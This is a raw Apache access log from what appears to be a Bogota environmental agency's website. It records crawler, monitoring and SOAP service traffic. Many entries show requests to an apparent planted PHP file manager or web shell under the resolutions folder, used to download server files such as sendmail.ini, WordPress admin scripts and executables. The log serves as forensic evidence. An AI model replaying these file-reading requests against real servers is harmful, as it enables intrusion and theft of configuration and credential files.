201.245.192.253 - - [21/Jun/2024:00:30:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.27.191 - - [21/Jun/2024:00:30:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1101-1150%5C&f=00001113.tif&white=1 HTTP/1.1" 200 92370
152.61.128.50 - - [21/Jun/2024:00:31:02 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Jun/2024:00:31:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.55.129 - - [21/Jun/2024:00:31:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2451-2500%5C&f=00002483.tif&white=1 HTTP/1.1" 200 265988
172.22.2.4 - - [21/Jun/2024:00:30:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62310
52.167.144.184 - - [21/Jun/2024:00:31:46 -0500] "GET /BLA/resoluciones/AUTOS%202023/3474.pdf HTTP/1.1" 304 -
54.167.223.174 - - [21/Jun/2024:00:31:55 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:32:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:32:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.18.211 - - [21/Jun/2024:00:32:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Csendmail&f=sendmail.ini&ft=download HTTP/1.1" 200 2096
201.245.192.253 - - [21/Jun/2024:00:32:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [21/Jun/2024:00:33:19 -0500] "HEAD / HTTP/1.1" 200 -
47.128.112.119 - - [21/Jun/2024:00:33:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=common.js&ft=download&white=1 HTTP/1.1" 200 24253
201.245.192.253 - - [21/Jun/2024:00:33:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:33:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
201.245.192.253 - - [21/Jun/2024:00:34:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [21/Jun/2024:00:32:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.55.148 - - [21/Jun/2024:00:34:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+701-750%5C&f=00000724.tif&ft=notepad&white=1 HTTP/1.1" 200 204844
201.245.192.253 - - [21/Jun/2024:00:34:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:34:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.184 - - [21/Jun/2024:00:34:55 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2006%2FRES+2006+1801-1850%2F HTTP/1.1" 200 12357
172.22.2.4 - - [21/Jun/2024:00:33:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
47.128.18.214 - - [21/Jun/2024:00:35:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Cautoliquidacion&f=in.jpg&ft=download HTTP/1.1" 200 4688
201.245.192.253 - - [21/Jun/2024:00:35:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
3.20.63.178 - - [21/Jun/2024:00:36:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:36:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.123.191 - - [21/Jun/2024:00:36:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4188.pdf&ft=download&white=1 HTTP/1.1" 200 372391
201.245.192.253 - - [21/Jun/2024:00:36:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:36:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
157.55.39.6 - - [21/Jun/2024:00:36:49 -0500] "GET /Publicaciones/2024EE110493.pdf HTTP/1.1" 404 228
47.128.122.203 - - [21/Jun/2024:00:37:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4560.pdf&ft=download&white=1 HTTP/1.1" 200 20135
201.245.192.253 - - [21/Jun/2024:00:37:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:37:35 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35908
201.245.192.253 - - [21/Jun/2024:00:37:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33476
3.12.251.153 - - [21/Jun/2024:00:37:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:38:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.99.238 - - [21/Jun/2024:00:38:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3741.pdf&ft=download&white=1 HTTP/1.1" 200 20135
216.245.221.92 - - [21/Jun/2024:00:38:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:38:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [21/Jun/2024:00:38:21 -0500] "GET /videos/1Video_CruzdeAmero.flv HTTP/1.1" 200 20682670
201.245.192.253 - - [21/Jun/2024:00:38:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:38:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
47.128.99.164 - - [21/Jun/2024:00:39:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+301-350&f=00000319.tif&ft=download HTTP/1.1" 200 131058
216.244.66.195 - - [21/Jun/2024:00:39:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1644.pdf HTTP/1.1" 200 893205
201.245.192.253 - - [21/Jun/2024:00:39:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:39:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36705
156.59.198.136 - - [21/Jun/2024:00:39:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_g8p1rtvhht8gieto8cdrlicv15 HTTP/1.0" 200 1034
172.22.2.4 - - [21/Jun/2024:00:38:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:40:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:40:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33476
201.245.192.253 - - [21/Jun/2024:00:40:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:40:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [21/Jun/2024:00:39:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55442
47.128.99.206 - - [21/Jun/2024:00:40:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1251-1300&f=00001275.tif&ft=download HTTP/1.1" 200 193502
201.245.192.253 - - [21/Jun/2024:00:41:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.71 - - [21/Jun/2024:00:41:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5426.pdf&ft=download&white=1 HTTP/1.1" 200 388775
3.212.128.62 - - [21/Jun/2024:00:41:53 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Jun/2024:00:42:05 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 304 -
201.245.192.253 - - [21/Jun/2024:00:42:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
178.168.111.168 - - [21/Jun/2024:00:42:19 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Jun/2024:00:42:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:42:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.54 - - [21/Jun/2024:00:42:45 -0500] "GET /catalogoisis/imagenes/correo.gif HTTP/1.1" 200 525
47.128.54.200 - - [21/Jun/2024:00:42:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5C&f=cosmeticos.swf&ft=download&white=1 HTTP/1.1" 200 396961
216.245.221.92 - - [21/Jun/2024:00:43:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:43:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [21/Jun/2024:00:43:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1764.pdf HTTP/1.1" 200 735723
3.20.63.178 - - [21/Jun/2024:00:43:29 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [21/Jun/2024:00:43:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1966.pdf HTTP/1.1" 200 533277
201.245.192.253 - - [21/Jun/2024:00:43:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
47.128.55.217 - - [21/Jun/2024:00:43:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3818.pdf&ft=download&white=1 HTTP/1.1" 200 20135
216.244.66.195 - - [21/Jun/2024:00:43:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1994.pdf HTTP/1.1" 200 267796
201.245.192.253 - - [21/Jun/2024:00:44:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [21/Jun/2024:00:44:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2012.pdf HTTP/1.1" 200 299290
201.245.192.253 - - [21/Jun/2024:00:44:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.54 - - [21/Jun/2024:00:44:27 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2002%2FRES+2002+51-100%2F HTTP/1.1" 200 12120
201.245.192.253 - - [21/Jun/2024:00:44:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.19.143 - - [21/Jun/2024:00:44:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin&f=load-scripts.php&ft=download HTTP/1.1" 200 2816
201.245.192.253 - - [21/Jun/2024:00:45:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.119 - - [21/Jun/2024:00:45:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cinstall&f=awk.exe&ft=download HTTP/1.1" 200 139264
186.154.54.48 - - [21/Jun/2024:00:45:49 -0500] "GET /%C3%82?fbclid=IwZXh0bgNhZW0CMTEAAR0qTuDgdO5G0GmR5__wcdXZxXBMKEiE0veYQSAYaGzTwVAR-FEhTqVhmHI_aem_ZmFrZWR1bW15MTZieXRlcw HTTP/1.1" 404 1266
186.154.54.48 - - [21/Jun/2024:00:45:49 -0500] "GET /favicon.ico HTTP/1.1" 404 1542
172.22.2.4 - - [21/Jun/2024:00:44:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:46:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:46:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.51.160 - - [21/Jun/2024:00:46:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cimpresion%5Cimages%5C&f=page98.swf&ft=download&white=1 HTTP/1.1" 200 29757
201.245.192.253 - - [21/Jun/2024:00:46:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [21/Jun/2024:00:45:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [21/Jun/2024:00:47:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.54 - - [21/Jun/2024:00:47:26 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2004%2FRES+2004+2001-2050%2F HTTP/1.1" 200 12347
66.249.66.19 - - [21/Jun/2024:00:47:27 -0500] "GET /BLA/resoluciones/AUTOS%202008/1577.pdf HTTP/1.1" 200 132354
47.128.63.120 - - [21/Jun/2024:00:47:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5C&f=wp-blog-header.php&ft=img&white=1 HTTP/1.1" 200 271
52.22.236.30 - - [21/Jun/2024:00:47:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:48:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [21/Jun/2024:00:48:19 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:48:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.44.217 - - [21/Jun/2024:00:48:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5883.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [21/Jun/2024:00:48:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:48:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
172.22.2.4 - - [21/Jun/2024:00:48:36 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 304 -
173.252.83.126 - - [21/Jun/2024:00:48:56 -0500] "GET /images/01052024%20Nota%20apertura%20senderos%20Cerros.jpeg HTTP/1.1" 200 130671
3.12.251.153 - - [21/Jun/2024:00:48:57 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:49:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.97.215 - - [21/Jun/2024:00:49:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=3&f=backbone.min.js HTTP/1.1" 200 2743
212.35.185.255 - - [21/Jun/2024:00:49:34 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Jun/2024:00:50:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
157.55.39.49 - - [21/Jun/2024:00:50:11 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2011%2F HTTP/1.1" 200 747162
47.128.125.94 - - [21/Jun/2024:00:50:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=pmgrant.exe&fullhexdump=1 HTTP/1.1" 200 2741
52.167.144.22 - - [21/Jun/2024:00:50:22 -0500] "GET /secretaria-de-ambiente-impone-sancion-por-puntos-de-obra-sin-permiso-en-el-humedal-tibabuyes.html HTTP/1.1" 200 990
201.245.192.253 - - [21/Jun/2024:00:50:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:50:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
69.63.184.9 - - [21/Jun/2024:00:50:58 -0500] "GET /images/paneles-solares-22septiembre.jpeg HTTP/1.1" 200 66691
47.128.51.19 - - [21/Jun/2024:00:51:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2683.pdf&ft=img&white=1 HTTP/1.1" 200 372495
201.245.192.253 - - [21/Jun/2024:00:51:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [21/Jun/2024:00:49:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:00:52:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.42.86 - - [21/Jun/2024:00:52:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs&f=media-grid.js&ft=download HTTP/1.1" 200 23700
201.245.192.253 - - [21/Jun/2024:00:52:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [21/Jun/2024:00:50:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [21/Jun/2024:00:52:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.62.53 - - [21/Jun/2024:00:53:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5317.pdf&ft=img&white=1 HTTP/1.1" 200 515855
35.166.228.98 - - [21/Jun/2024:00:53:17 -0500] "HEAD / HTTP/1.1" 200 -
216.245.221.92 - - [21/Jun/2024:00:53:19 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.102 - - [21/Jun/2024:00:53:21 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2004%2FRES+2004+1901-1950%2F HTTP/1.1" 200 12350
201.245.192.253 - - [21/Jun/2024:00:53:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:53:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
172.22.2.4 - - [21/Jun/2024:00:53:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
47.128.49.163 - - [21/Jun/2024:00:54:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cjs%5C&f=index.js&ft=download HTTP/1.1" 200 120
201.245.192.253 - - [21/Jun/2024:00:54:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:54:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:54:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
34.198.201.66 - - [21/Jun/2024:00:54:54 -0500] "HEAD / HTTP/1.1" 200 -
47.128.61.165 - - [21/Jun/2024:00:54:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2024%5C&f=00693.pdf&ft=img&white=1 HTTP/1.1" 200 98063
201.245.192.253 - - [21/Jun/2024:00:55:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.60.197 - - [21/Jun/2024:00:55:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5297-.pdf&ft=download&white=1 HTTP/1.1" 200 278182
201.245.192.253 - - [21/Jun/2024:00:56:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [21/Jun/2024:00:56:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:56:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.63.22 - - [21/Jun/2024:00:56:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000&f=2000+1450-1499.tif&ft=download HTTP/1.1" 200 622236
201.245.192.253 - - [21/Jun/2024:00:57:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [21/Jun/2024:00:55:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.60.133 - - [21/Jun/2024:00:57:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=bearhtml.dll&ft=img&white=1 HTTP/1.1" 200 995087
201.245.192.253 - - [21/Jun/2024:00:58:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [21/Jun/2024:00:58:19 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Jun/2024:00:56:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [21/Jun/2024:00:58:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [21/Jun/2024:00:58:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38395
201.245.192.253 - - [21/Jun/2024:00:58:35 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
34.198.201.66 - - [21/Jun/2024:00:58:43 -0500] "HEAD / HTTP/1.1" 200 -
47.128.60.172 - - [21/Jun/2024:00:58:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+1551-1600&f=00001553.tif&ft=download HTTP/1.1" 200 20131
201.245.192.253 - - [21/Jun/2024:00:59:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.43.36 - - [21/Jun/2024:00:59:38 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cboletinlegal%5C&f=proc.php&ft=download&white=1 HTTP/1.1" 200 467
201.245.192.253 - - [21/Jun/2024:01:00:07 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
3.12.251.153 - - [21/Jun/2024:01:00:12 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Jun/2024:01:00:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.123.143 - - [21/Jun/2024:01:00:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page7.swf&ft=download HTTP/1.1" 200 23133
